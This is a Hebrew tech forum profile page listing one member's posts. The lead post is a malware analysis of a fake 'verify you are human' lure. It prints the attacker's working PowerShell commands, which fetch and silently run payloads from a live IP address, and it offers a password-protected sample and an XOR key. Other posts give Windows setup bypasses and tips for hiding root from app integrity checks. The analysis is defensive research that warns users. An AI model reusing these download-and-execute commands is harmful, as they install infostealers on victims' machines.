דילוג לתוכן
  • חוקי הפורום
  • פופולרי
  • לא נפתר
  • משתמשים
  • חיפוש גוגל בפורום
  • צור קשר
עיצובים
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • ברירת מחדל (ללא עיצוב (ברירת מחדל))
  • ללא עיצוב (ברירת מחדל)
כיווץ
מתמחים טופ
cfopuserC

cfopuser

@cfopuser
אודות
פוסטים
2.4k
נושאים
23
שיתופים
0
קבוצות
0
עוקבים
16
עוקב אחרי
1

פוסטים

פוסטים אחרונים הגבוה ביותר שנוי במחלוקת

  • שיתוף | בואו נהנדס לאחור וירוס (שימו לב לא להוריד קבצים משרשור זה)
    cfopuserC cfopuser

    שימו לב בשרשור זה מובאים קבצים מסוכנים! נלקחו לא מעט צעדים כדי לסננם ולהגן עליהם מפני הורדה מוטעת

    אך עדיין חובת האזהרה כאן

    בהמשך לשרשור הזה, הבאתי כאן את עיקרי הדברים ממה שעברתי על הוירוס.


    74cc4a56-3ae6-49a6-bc57-6bd1a06bb424-2.png

    אז בואו נעשה סדר בתהליך התקיפה, שלב אחר שלב.

    שלב 1: ההדבקה/ההידבקות הראשונית.

    הכל מתחיל כשהקורבן מתבקש באתר לאמת את זהותו על ידי הדבקת פקודה לחלון Win + R.


    11c36a32-ace9-433a-99c1-8ed57d199c08-image.png
    |

    הפקודה הזאת זה ההתחלה:

    powershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.171:5506/clo.txt'));I am not a bot - Verification ID: #8626                  )
    

    הפקודה הזו מריצה PowerShell בחלון מוסתר (-wi mi) ומורידה ומפעילה תוכן מקובץ clo.txt מהשרת של התוקף.

    בתוך הקובץ clo.txt אנו מוצאים את הקוד הבא:

    $u='http://84.21.189.171:5506/wir.txt'
    $i='Invoke-WebRequest'
    $e='Invoke-Expression'
    $r=& $i -Uri $u -UseBasicParsing
    & $e $r.Content
    

    הסקריפט הזה פשוט מוריד ומריץ את השלב הבא בשרשרת: הקובץ wir.txt.
    הקובץ wir.txt מכיל את הקוד הסופי של שלב ההדבקה:

    &{$u='http://84.21.189.171:5506/JDYQAKRR.msi';$p="$env:TEMP\s$(Get-Random).msi";(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process msiexec.exe -Args @('/i',"`"$p`"",'/qn','/norestart') -WindowStyle Hidden -Wait;Remove-Item $p -Force}
    

    הסקריפט הזה מוריד קובץ JDYQAKRR.msi לתיקיית ה-TEMP תחת שם אקראי, מתקין אותו בשקט (/qn) ובחלון מוסתר, ואז מוחק את קובץ ההתקנה כדי לטשטש עקבות.
    עכשיו אנחנו מגיעים לחלק עם הבשר הווירוס עצמו.

    שלב 2: במבט מלמעלה

    הנה הקובץ בשביל מי שרוצה, סיסמה infected
    malware_sample.msi.7z

    זהירות קובץ מסוכן!!

    לאחר חילוץ ה-MSI, מתגלה לנו מבנה התיקיות הבא:

    msi-extracted
    │   malware_sample.msi
    │
    └───Layperson
            Cieg.keac
            Croort.jga
            D_Droid.exe
            mfc110u.dll
            MSVCP110.dll
            MSVCR110.dll
            sciter32.dll
            zpsres.US.dll
    

    מה שישר תופס את תשומת הלב זהו הקובץ D_Droid.exe. החשד המיידי נפל עליו.
    העלאתו ל-VirusTotal מגלה שהוא חומק בקלות רבה מאנטי-וירוסים שונים. דבר מדאיג ומזר בהחלט (לפחות בהווא אמינא).

    עכשיו ביליתי לא מעט זמן עובר על הקובץ מוצא לופים של הצפנה והרגשתי קרוב,
    למרות זאת לא מצאתי שום דבר אמיתי ממה שחיפשתי לא הרצה של payload לא קריאות מוזרות לשרתים, כלום.

    בנוסף על כול זה גם virustotal החזיר בדיקה נקייה,
    בשלב הזה בדקתי את הפרטים של הקובץ וראיתי להפתעתי שהקובץ חתום ומסתבר שהוא איננו זדוני.
    כך שסתם ביזבזתי את הזמן עליו (נלמד להבא...)

    למעשה מבדיקה קלה של הקובץ אנחנו יכולים לראות שיש לנו עסק
    עם תוכנה חתומה ורגילה בשם Zoner Photo Studio 18

    אז אחרי כול זה (שמסתבר שעקבתי אחרי המפתחות רישיון של התוכנה במקום את של הוירוס).
    צריך להבין אז מה קורה כאן בעצם?

    שלב 3: אז איפה הוירוס נמצא?

    עכשיו ששללנו את הexe,
    מה שהוביל אותי למסקנה שהוירוס טמון כנראה בדבר שנקרא dll swapping (החלפת dll)
    בעיה שמשפיעה גם בוירוסים וגם תוקפת בחוזקה כאשר מפתחים קיוסק תורני.

    כלומר יש קובץ dll זדוני בתוך הקבצים שלנו שמתחזה לאחד מהקבצים הרגילים כך
    שברגע שהתוכנה קוראת לו הוא נכנס לפעולה ומפעיל את השלב הבא של הוירוס,
    זה אומר שיש כאן מתחזה, השאלה היא רק מי הוא.

    בהסתכלות על מערכת הקבצים אנחנו יכולים לראות מספר דברים:

    • MSVCP110.dll, MSVCR110.dll: קבצי סביבת ריצה סטנדרטיים של ++C (MFC ו).
    • sciter32.dll: ספרייה לרינדור ממשקי משתמש מבוססי HTML.
    • zpsres.US.dll: קובץ משאבים של התוכנה. (וגם מכיל תמונה מוזרה של תוכי משום מה! נראה שהתמונה נמחקה 🤷‍♂️)
    • mfc110u.dll: זהו קובץ השייך לספריית MFC של מיקרוסופט. שבמבט ראשון נראה תקין, אבל בבדיקה מעמיקה יותר, מתגלה שהקובץ אכן חתום אבל פגום, והחתימה שווה כקליפת השום.

    למעשה גיליתי שהחתימה שלו לא תקפה רק בשלב יותר מאוחר אבל השארתי את זה כאן כדי לשמור על סדר

    • יש את שני הקבצים Croort.jga (21KB) ו Cieg.keac (2.5mb) שניהם מהסתכלות מלמעלה נראים מוזרים,
      הקובץ מחתחיל עם לא מעט מחרוזות טקסט חסרות פשר ואז מגיע למקטע IDAT (מקטע מידע בקובץ Png),
      סריקה בbinwalker לא הולידה פירות כך שאנחנו מתעסקים כנראה עם קובץ מוצפן או לא מוגדר (סריקת entropy מראה על נתונים סבירים אבל היא משתנה ברגע שמורידים את כול הטקסט בהתחלה).
      מה שמוביל להנחה שהם השלב הבא.

    שלב 4: פענוח הPayload

    כדי לפענח אותם, יצרתי סקריפט עם ai שסורק קומבינציות הצפנה שונות בחיפוש אחר המחרוזת http://. הסריקה העלתה שהקבצים "הוצפנו" באמצעות XOR, והמפתח הוא F9A7E67E.

    לאחר הפענוח, קיבלנו קובץ שמכיל בתחילתו את הטקסט המוכר: "This program cannot be run in DOS mode". זוהי אינדיקציה ברורה שאנחנו מתעסקים עם קובץ הרצה (EXE או DLL וטכנית גם sys). למרות זאת, הקובץ המפוענח עדיין לא מזוהה למרות שסוגרים אותו וכו'.

    אז עד כאן הגעתי איתרתי לא מעט כתובות שהתוכנה קוראת להם חלקם לא רשומות וחלקם לא זמינות לפחות ממה שניסיתי.

    אני ישתדל להמשיך את המחקר בזה מי שרוצה מוזמן להמשיך פה בנושא בהצלחה.

    ניתוח הפעילות מתוך vitus total:

    ניתוח התנהגותי של הווירוס בסביבה מבוקרת (Sandbox) חושף את היכולות האמיתיות שלו. הנה פירוט הטכניקות שזוהו, לפי מודל MITRE ATT&CK:

    קטגוריה (Tactic) טכניקה (Technique) מזהה תיאור
    Persistence (התמדה) Pre-OS Boot: Bootkit T1542.003 הווירוס משתמש ב-bcdedit.exe כדי לשנות את הגדרות האתחול של Windows, מה שמאפשר לו לרוץ לפני שמערכת ההפעלה עולה במלואה ולהשיג שליטה עמוקה.
    Privilege Escalation (הסלמת הרשאות) Process Injection T1055 כותב קוד לתוך הזיכרון של תהליכים אחרים (כמו rundll32.exe) כדי להריץ קוד זדוני בהקשר של תהליך לגיטימי.
    Defense Evasion (התחמקות מהגנות) System Binary Proxy Execution T1218 מריץ DLL זדוני (sciter.dll במקרה שזוהה) באמצעות תהליך מערכת לגיטימי כמו rundll32.exe כדי להסוות את פעילותו.
    Virtualization/Sandbox Evasion T1497 בודק אם הוא רץ בסביבת ניתוח (Sandbox) או תחת Debugger כדי להימנע מגילוי.
    Impair Defenses T1562 עלול לנסות להשבית או לפגוע בכלי אבטחה קיימים במערכת.
    Discovery (גילוי) Process Discovery T1057 סורק תהליכים רצים במערכת, כנראה כדי לאתר תהליכי אבטחה או כדי להזריק קוד לתהליכים ספציפיים.
    Command and Control (שליטה ובקרה) Application Layer Protocol T1071 משתמש בפרוטוקולי רשת סטנדרטיים (כמו HTTP) כדי לתקשר עם שרתי השליטה והבקרה שלו.

    סיכום

    • זוהי מתקפה די ידועה ודי אפקטיבית,
      אם נפלתם בה ההמלצה המידית היא לכבות את המחשב לגבות את כול הנתונים מגרסת live ולפרמט.

    • בנוסף יש לשנות את הסיסמאות בכול החשבונות שיש לכם,
      ולדאוג להתנתק מהחיבורים הנוכחים שי לכם ליתר ביטחון.

    • בנוסף אין להשתמש יותר בסיסמאות שהשתשמתם בהן בכול חשבון שהוא בשעת הפריצה.
      או לכול הפחות לא תחת אותה כתובת מייל.

    • במידה ואין לכם ידע בנושא יש לפנות לבעל מקצוע.

    TL;DR/אמלוק

    וירוס infostealer סטנדרטי
    אהבתי את איך שהוא הזריק את עצמו יש טיפה fuzzing
    לא יודע אם זה עקיצה מכוונת שהשם של התיקייה זה layperson
    סך הכול נחמד יש עוד לראות ולבדוק מוזמנים.

    כתבתי לבד עשית שיפצור לפוסט עם ai
    אם יש טעויות זה לא אני😉 זה הוא

    עריכה: נראה שהוירוס הוא אכן infostealer כולשהוא,
    והקבצי payload שפיענחנו הופכים לקובץ exe חתום בסופו של דבר (שזה הרבה כסף)
    הקובץ חתום תחת שם של אדם / חברה שכנראה אין להם קשר לעניין חוץ מהועבדה שרשיונם נגנב וכבר משמש מספר פעמים כדי להפיץ וירוסים כאלה,
    מבדיקה נראה שזה משמש בכמה תקיפות הרישיון הזה והכול בהקשר של Lume stealer,
    (גם במקרה דומה שהובא פה בפורום זה הם בסופו של דבר)

    בסופו של דבר יוצא קובץ חדש שהוא הוירוס עצמו שעושה את כול מה שתצפו גונב מידע וכו' רק חשבתי להזכיר את זה שזה חתום זה היה מציאה די מעניינת.

    להנדס את הוירוס עצמו אולי אני יעשה בעתיד אם אני ימצא לזה זמן או כול אחד אחר מוזמן לעשות את זה.

    עזרה הדדית - מחשבים וטכנולוגיה

  • שיתוף | אתר להתקנת a bloq (בטא)
    cfopuserC cfopuser

    כשמו כן הוא אתר פשוט ומהיר להתקנת חסימת a bloq של @iosi-poli
    לבינתיים זה בבטא כי יש כמה שינויים שאני רוצה להכניס,
    אבל לבינתיים זה מספיק בשל לדעתי כדי לפרסם.

    היתרונות גדולים אין צורך בהתקנה אין צורך בהסרת חשבונות ועוד.

    למעבר לאתר

    תמונות

    7cb9d35d-8eac-4756-a955-24fe2cb6127a-image.png

    7c6c88d6-933b-4294-88c9-0bcda1ed407c-image.png
    fe236d8a-e073-44d9-9cfd-8b74a6aea6b5-image.png

    43a52339-08ea-448d-9893-5ce834d7a96a-image.png

    אשמח לשמוע הערות והארות.
    תהנו.

    שאלות נפוצות:

    • ש. האתר מראה הודעה שהדפדפן לא נתמך, מה זה אומר?

    f6f78ddd-8315-42e8-9af1-93b43c6ba3f9-image.png
    ת. הדפדפן שלכם לא תומך בחיבור מכשירי usb דרך הדפדפן אנא השתמשו בדפדפן אחר.


    • ש. מה זה אומר התקנה ללא הסרה?

    f9597003-4419-4e45-86a4-a19909bdd3d4-image.png
    ת. זהו פיצ'ר ניסיוני אשר מאפשר להתקין את החסימה ללא, הסרה של החשבונות.


    • ש. האתר מציג הודעה של "פעולה זו אינה זמינה באנדרואיד 14+", מה זה אומר?
      ת. כחלק מעדכוני גוגל שונתה הדרך שבדיקת חשבונות פועלת עקב כך ההסרה אוטומטית אינה זמינה במכשירים אלו.

    • ש. האתר לא מצליח להתחבר למכשיר ומציג הודעת שגיאה, מה לעשות?
      ת. נסו את האפשרוית הבאות.
    1. ודאו שהמכשיר פתוח ושאתם מאשרים את ההודעה במכשיר.
    2. נתקו וחברו את המכשיר, ורעננו את האתר.
    3. ודאו שהאתר לא פתוח במקום נוסף.
    4. במידה וadb מותקן במחשבכם או/ו יש תוכנה עםadb שמותקנת,
      כבו את adb הנ"ל עם הפקודה
    adb kill-server
    אפליקציות להורדה

  • להורדה | אפליקצית חסימה לאנדרואיד אייבלוק (A Bloq) (מבוסס על MDM) (בטא 0.4.6)
    cfopuserC cfopuser

    תוכנת התקנה

    כדי להקל על אלו שרוצים להשתמש באפליקצייה אבל לא רוצים להתקין adb ולוודא שיש להם את הגרסה העדכנית
    חשבונות וכו'

    הכנתי תוכנת התקנה שבאה עם הוראות סרטוני הדרכה ועדכון אוטמטי בהצלחה

    התוכנה זמינה כעת רק לווינדוס תמיכה למק ולינוקס תבוא בהמשך

    אשמח אם יעדכנו אם יש באגים וכו'

    להורדה https://drive.google.com/file/d/1r****BjWLHM0FWQqE5dUBcGr7Z-vDtA-UZ07/view?usp=sharing

    להוריד כוכביות

    כייון שהתוכנה מתעדכנת מפעם לפעם עם תוספות חדשות וכדי להקל על המחפשים יש לה נושא נפרד כאן

    אפליקציות להורדה

  • המלצה | הפתעה לבעלי JELLY STAR - עידכון לאנדרואיד 16!!
    cfopuserC cfopuser

    @נחלס-דון כתב בהמלצה | הפתעה לבעלי JELLY STAR - עידכון לאנדרואיד 16!!:

    אני רק לא מבין איך טכנית אפשר לעשות כזה שידרוג,
    כשניסיתי לערוך גירסה לm36 חלמתי על אנדרואיד16 ואז גיליתי שבקושי אנדרואיד15 אפשר וגם אז בלי בלוטוס וכו’ בגלל הדרייברים, אז איך פה משדרגים ל16, (ואם הם משדרגיםגם את הדרייברים, מה הבעיה לעשות את זה בm36??)

    תשאל שאלה יותר קיומית,
    איך הם בכלל בנו את המכשיר, בלי דרייברים הרי כידוע דריברים נוצרו בערב שבת בין השמשות.

    עכשיו ברצינות ליצרני המכשירים יש גישה מלאה לקוד המקור ככה שדרייברים הם לא מחסום בכלל,
    מה שאין כן אנחנו שצריכים להנדס לאחור את הכול.|

    עזרה הדדית - אנדרואיד

  • שיתוף | תוכנה לזיהוי פירטי רכב ע"י לוחית רישוי אופליין
    cfopuserC cfopuser

    בהמשך לשרשור פה

    הוכנה כאן גרסה לווינדוס,
    הגרסה מתבססת על העבודה הראשונית של @איש-אמת.

    אשמח לדיווח על באגים כולשהם, או בקשות פיצ'רים.

    להורדה

    להורדת מסד הנתוונים (מאגר) https://drive.google.com/file/d/1j8M-BAn32eifw*******dYXrJb9u0Wb8sIXRYGC
    יש לחלץ את המאגר לפני השימוש.


    7978f03e-d4cc-4a15-a60a-905d755cfc82-image.png

    f66b490e-d69b-4c4e-8dba-f1d0f983190e-image.png

    6a6f7173-7d84-44ac-aac1-23dccdf7f54d-image.png

    תהנו.

    עזרה הדדית - מחשבים וטכנולוגיה

  • שיתוף | מעקף יצירת חשבון ווינדוס גם בעדכון החדש.
    cfopuserC cfopuser

    לאחר שמייקרוסופט מחקו בעדכון האחרון הרבה מהדרכים הידעות להתקין את ווינדוס ללא אינטרנט (פקודות בטרמינל וכו')

    להלן הדרך הכי קלה שנשארה:

    עבור משתמשי ווינדוס פרו בלבד עקבו אחר הצעדים האלה:

    בחלון הראשון בחרו ליצור חשבון לימודים/עבודה (סמל של מזוודה)

    00b15ce4-f4a4-4347-bb99-c264a3a52ed6-image.png

    עברו לחלון הבא שם מתחת לתיבת הטקסט עבור המייל לחצו על אפשרויות כניסה נוספות:

    6930ce0b-b929-4348-96a7-c26c70a01843-image.png

    ולאחר מיכן לחצו על האפשרות השנייה של כניסה באמצעות דומייין (סמל של ענן חסום):

    eb41d364-c5b6-4549-8667-424aadf046ac-image.png

    מכאן והלאה המשיכו בתהליך היצירה כרגיל,
    שם משתמש, סיסמה וכו'.

    זה הדרך הכי פשוטה כנראה מלבד ליצור חשבון מקומי מראש בתוכנות שונות.

    עזרה הדדית - מחשבים וטכנולוגיה

  • שיתוף | פרצה חדשה במיליוני מכשירי בלוטוס
    cfopuserC cfopuser

    לאחרונה נתגלתה פרצה בפרוטוקול fast pair של גוגל שקייים כמעט בכול אוזניות בלוטוס המתקדמות
    הפרצה נגרמה עקב כך שיצרנים לא השתמשו בפרוטוקול כראוי
    (האוזניות אמורת להימנע מבקשות ממכשירים זרים כאשר הם לא במצב pair מה שלא קרה בכמעט כול האוזניות והמכשירים)

    כדי להבין כמה חמורה הפרצה,
    היא מאפשרת השתלטות על השמע, (תוכלו להשמיע כול דבר בפול וליום)
    תוכלו לדוג' להאזין למיקרופון,
    והחמור מכול אם המכשיר לא מחובר לחשבון גוגל כולשהוא תוקפים יכולים לחבר אותו לחשבון שלהם ולהתחיל לאכן אתכם באמצעות find my של גוגל.

    לבינתיים אין patch כללי וצריך לבדוק כול דגם וחברה בנפרד.
    ולעדכן את המכשירים במידת האפשר.

    יש כאן אתר שמכיל רשימה של מכשירים שנמצאו פכיעים (גם אם אתם לא ברשימה זה לא אומר שהמכשיר לא פגיע)
    https://whisperpair.eu/vulnerable-devices
    האתר הוא חלקי ומכיל רק מעט דגמים אבל פשוט לבדוק אם המכשיר שלכם תומך בgoogle fast pair וכנראה הוא פגיע.

    עדיין אין סקריפט לפליפר לפחות לא אחד שאני הצלחתי למצוא למי שתוהה
    גם החוקרים לא שיתפו poc מסיבות מובנות אבל כן קיבלו 15,000$ כך שהבאג כן רציני וזה רק עניין של זמן עד שהוא ישוחזר ויופץ

    חשוב לומר פריצה ללא אישור וקו"ח שהפעלת איכון ללא אישור מפורש על מכשירי בלוטוס זרים זוהי עבירה על החוק.
    כול האמור כאן הוא למטרות ידע בלבד.

    עזרה הדדית - מחשבים וטכנולוגיה

  • עזרה | צינזור אפליציות
    cfopuserC cfopuser

    @ע-ה-דכו-ע באמת יש דברים בגו.

    אז אם אתה רוצה אני ישתף אותך טיפה שכבר חשבתי על הנושא הזה,

    פעם שעבדתי על מודל שיסנן תמונות ואמרתי לעצמי שזה לא משנה שזה חלק מהפיתוח, המטרה לא מקדשת את האמצעים.

    וב"ה מצאתי פיתרון והוא שאני שם את התמונות על הגודל הכי קטן ופשוט מביא לai בלי להסתכל את התוכן, מקבל תיאור מילולי של התמונה.
    לאחמ"כ אם היא מצריכה הכשרה אני אומר לו שיסיר את האנשים ומוריד את הקובץ ומחליף.

    אני אפילו לא פותח את האפליקצייה רק לאחר שהכשרתי אני פותח כדי לראות שהכול עובד.

    עזרה הדדית אפליקציות

  • בירור | הודעה מוזרה בהדלקת המחשב
    cfopuserC cfopuser

    @מישהו12 הפתרון שעבד לי פעם זה פשוט ללכת לנתיב של אדובי

    | c:\Program Files\Adobe\

    ולמחוק את התקייה Adobe Creative Cloud Experience

    האופצייה הנוספת
    זה ללכת תזמון המשימות (task scheduler)
    ולבחור בצד שמאל Adobe CCX
    ולמחוק את התזמון של Adobe CCX

    שניהם כנראה יעבדו

    תמיד תוכל לבטל את ההפעלה של כול תוכנה של אדובי בהתחלה

    ללכת לווינדוס+R לכתוב msconfig

    לבחור תהליכים
    להסתיר תהליכים של מייקרוסופט
    ולכבות את כול התהלכים של אדובי

    שורש הבעיה שאדובי לא מוחקת הכול כאשר מסירים את התוכנה

    עזרה הדדית - מחשבים וטכנולוגיה

  • המלצה | תחשבו פעמים האם להטעין את הפלאפון במקומות ציבוריים
    cfopuserC cfopuser

    @מחובר-23 אין שום סכנה באוטובוסים כול הסכנה זה בעמדות ציבוריות וגם זה מוגזם מאודדד

    • א' אם לא תאפשר שיתוף נתונים לכול כבל רנדומלי באוטובוס לא יקרה כלום.

    • ב' הסיכון היחיד זה שהכבל הוא בעצם כבל omg והסיכוי שזה יקרה אם אתה לא ביבי זה אפס. (לא רק הפן הכלכלי גם צריך להתאים את עצמם למכשיר ועוד ועוד)

    הדוג' שהם הביאו מblack hat זה דוג' ישנה מאוד שהתבססה על חוסר אחריות מצד אפל
    שכמובן לא קיים כיום.

    בקיצור אין סיבה לחשוש ואין סיבה להביא לינקים מgpt ולפזר מידע שגוי

    כללי - עזרה הדדית

  • בירור | וויז לעיר טבריה לכהנים
    cfopuserC cfopuser

    @כהן-צדק הגעתי למסקנה שלבנות אפליקצייה שלמה רק בשביל זה לא שייך
    כייון שאני פשוט יבנה משהו שכבר קיים
    ולבנות אתר גם לא שייך כי צריך לתחזק

    אז החלטתי להשתמש באפליקציות הקיימות שתומכות בניווט אופליין ולוקחות מפות מותאמות אישית

    הרעיון שיהיה מפה מותאמת אישית (קובץ pbf) שהרחובות האסורים נערכו מחוץ לה וכול כוהן שירצה להישמר
    יוכל להכניס את המפה לאחת מהאפליקציות (maps.me` osmand וכו') והניווט לא יעבור דרך האזורים המסומנים
    כרגע אני מתמקד בלברר מה כול הסוגים הנצרכים (pbf, osm ,fvx) ועוד
    לאחמ"כ אני יוציא את כולם בצורה מסודרת

    אי"ה אני ימצא זמן וישקיע בזה יותר

    עזרה הדדית - מחשבים וטכנולוגיה

  • שיתוף | גוגל פיצחה את airdrop של אפל.
    cfopuserC cfopuser

    אז כן, מי שלא שמע: חברת גוגל יצאה בהודעה שמכשיריה מסדרת Pixel 10 יתמכו כעת בשיתוף קבצים עם מכשירי אפל. המהלך מתבצע על ידי שימוש בפרוטוקול AirDrop, שעד לפני מספר ימים היה בלעדי לשימוש במכשירי אפל.

    והדבר המפתיע הוא שזה אינו שיתוף פעולה בין החברות, אלא תעוזה של גוגל שניתחה את הפרוטוקול וגרמה לכך שמכשירי אפל רואים את הפיקסל כמכשיר אפל נוסף.

    גוגל הודיעה בנוסף שהיא תתמוך גם ב"שיתוף קרבה" (פיצ'ר נוסף של אפל, המאפשר קירוב שני מכשירים זה לזה לשיתוף אנשי קשר קבצים ועוד).

    והקטע המפתיע באמת (לפחות אותי): גוגל יצאה במגוון הודעות על כך שהשיתוף מאובטח לחלוטין – לא מעקף ולא כלום. לעת עתה, הפיצ'ר זמין רק במכשירי הדגל של החברה (הפיקסל 10) ורק למכשירים חדשים.

    אפל עדיין לא הגיבה על המהלך, אבל ייתכן שמכיוון שגוגל משחררת את הפיצ'ר רק באירופה, החברה מוגנת חוקית.

    בלוג אבטחה של גוגל (למעוניינים בניתוח הפרוטוקול):
    https://www.netspi.com/wp-content/uploads/2025/11/google-feature-review-report.pdf

    כתבה של The Verge:
    https://www.theverge.com/news/825228/iphone-airdrop-android-quick-share-pixel-10

    עזרה הדדית - מחשבים וטכנולוגיה

  • בעיה | ווצאפ לא עובד בגלל אימות אבטחה
    cfopuserC cfopuser

    @לילות-כימים הבעיה באפליקציות כאלה שהמערכת עצמה חושפת אותך (ווטסאפ בעצמו אולי לא חשף אותך אבל אפליקצייה אחרת כגון גוגל סרוייס וכדו' כן והמידע משותף)

    בקיצער קשה לפתור את זה במצב הזה

    אבל הפתרון פעם הבאה שאתה עושה רוט זה להתקין Zygisk ומג'יסק מעודכן ולוודא שבוטלואדר מוסתר כמו שצריך

    זה אומר להתקין את כול המודלים שצריך Play Integrity Fix וגם Shamiko (מומלץ מאוד)
    LSPosed (ובתוך LSPosed להוריד אקסטרה הגנה לווטסאפ)

    להריץ בדיקה כדי לראות אם אפשר לעלות עליך
    אני ממליץ להתקין קרנל חסום בנוסף

    הכוונה לקרנל שבמקום שאתה תבחר אפליקציות שלא יוכלו לראות אותו אתה תבחר מי כן יכולה (הרבה יותר בטוח)

    הבעיה היחידה זה זמינות למכשירים יש כמה סוגים לדוג' KernelSU ו Arrow

    אחרי שעשית את זה רק אז תפעיל את הגוגל סרוויס וכו' כי מספיק משהו אחד שמגלה אותך וכול המערכת יודעת

    עזרה הדדית - שיאומי f21 pro ו +f21 pro

  • תגובות | המדריך המלא: הוספת זיהוי פנים לכל מכשיר אנדרואיד עם רוט
    cfopuserC cfopuser

    @שניאור-שמח העליתי כאן את כול הקבצים בצורה מסודרת עם שמות מתאימים

    https://drive.google.com/file/d/1KaMIW3ls2DdX****5zpNOSIPqlDO2fEaQIuf/view?usp=drive_link

    (אני לא בטוח איפה לשים תכוכביות...🤦‍♂️)
    הסיסמה 1234
    לקובץ אפליקצייה לא להתקין צריך להוסיף את הסיומת APK

    (אני יודע שזה לא יהיה מעודכן להרבה זמן בצורה כזאת אבל רוב הדברים כאן לא עודכנו שנים)

    עזרה הדדית - אנדרואיד

  • שאלה | למה אפשר לתת עד 20 ליקיים בפורום
    cfopuserC cfopuser

    @בונפד כמו בכלכלה כך גם בכול מקום

    אינפלצייה

    אופן השימוש בפורום

  • עזרה | איני מצליח להתקין תוכנות חיצוניות בוינדוס 11
    cfopuserC cfopuser

    @ישראל-אמיתי אם השינוי בהגדרות שהוצע למעלה לא עבד
    והתקנה מחדש של ווינדוס אינה אופצייה (אובדן מידע וכו')
    ואין אפשרות לאינטרנט

    המדריך הזה בשבילך

    הערה חשובה!
    השינויים האלה מתעסקים ברכיבים רגישים של המחשב
    אם אתה לא מרגיש בנוח פנה לאיש מקצוע

    יציאה ממצב S ללא אינטרנט וללא אובדן מידע

    נלך להגדרות>מערכת>שחזור>הגדרות אתחול מתקדמות - הפעל מחדש כעת.
    כעת אתה אמור להיכנס לסביבת השחזור (WinRE)
    לאחר הכניסה ל-WinRE, במסך בחר אפשרויות עברו לפתור בעיות>אפשרויות מתקדמות>שורת פקודה.

    בחלון הפקודה שיפתח תכתוב את הפקודה

    regedit
    

    יפתח לך חלון עם מעין תיקיות בצד

    לאחת מהם ייהיה את השם HKEY_LOCAL_MEACHIN

    תבחר אותה ולאחר מיכן תלחץ על הכפתור file בצד שמאל למעלה משם תבחר ...load hive


    1dcc0e51-dbff-40e3-bba1-5a92b9664eb7-image.png

    בחלון שיפתח תנווט לדיסק c

    a0da5d54-a93f-483a-acbc-55b3d59a1fcb-image.png

    משם לעבור לתקייה windows (לא להתבלבל עם windows.old)

    משם לגלול למטה עד שמגיעים לתקייה בשם System32
    להיכנס אליה לגלול שוב למטה (טיפה) עד שמגיעים לתקייה בשם config

    כעת תראה מלבד תיקיות גם קבצים תלחץ על האחד שמשנה לנו System
    ולחץ open (פתח) בשורה למטה

    6477bee5-8efe-45db-8785-0db19919526b-image.png

    כעת יפתח תיבת טקסט נכניס לתוכה את המילה Offline ונאשר כדי לטעון

    86336fc7-bd8c-4eef-af47-74c82cc573f6-image.png

    כעת תתוסף לנו בסרגל הצד תקיית Offline
    נלחץ על החץ בצידה ולאחמ"כ נבחר את controlset001

    7ea2e030-d409-4733-b458-6e8ec50ecdd2-image.png

    אחרי זה נפתח את control
    לאחמ"כ נפתח את ci
    ובci נלחץ פעמים על התיקייה policy

    933ff08d-d836-41da-ba37-55a5cde609b6-image.png

    עכשיו יפתח לנו בצד השני שני קבצים נלחץ פעמים על התחתון SkuPolicyRequierd
    ובחלון שיפתח תופיע בשורה השנייה הספרה 1 נשנה לספרה 0 ונלחץ אישור

    f5ff8638-9c02-47a4-8c6b-426a6022a032-image.png

    נכווץ את כול התקיות הפתוחות ונבחר את התיקייה Offline שוב
    כעת נלך שוב פעם לכפתור בצד שמאל למעלה שכתוב ╔ file
    נלחץ עליו ונבחר את האופצייה ...unload hive

    bcb946ce-abea-4a86-8549-ffa956c311f0-image.png

    בחלון שיפתח נבחר אישור
    וזהו סיימנו נסגור את כול החלונות ונפעיל מחדש את המחשב

    שמישהו יעשה את זה מדריך מסודר איפה שהוא @ASER

    עזרה הדדית - ווינדוס 11

  • עזרה | צינזור אפליציות
    cfopuserC cfopuser

    @מחובר סיימתי ספרתי שתי תמונות שהורדתי את האנשים מהם תבדוק אם פיספתי משהו

    dual-player-clean-SIGN.apk

    dual-player-clean-SIGN.zip

    עזרה הדדית אפליקציות
  • התחברות

  • אין לך חשבון עדיין? הרשמה

  • התחברו או הירשמו כדי לחפש.
  • פוסט ראשון
    פוסט אחרון
0
  • חוקי הפורום
  • פופולרי
  • לא נפתר
  • משתמשים
  • חיפוש גוגל בפורום
  • צור קשר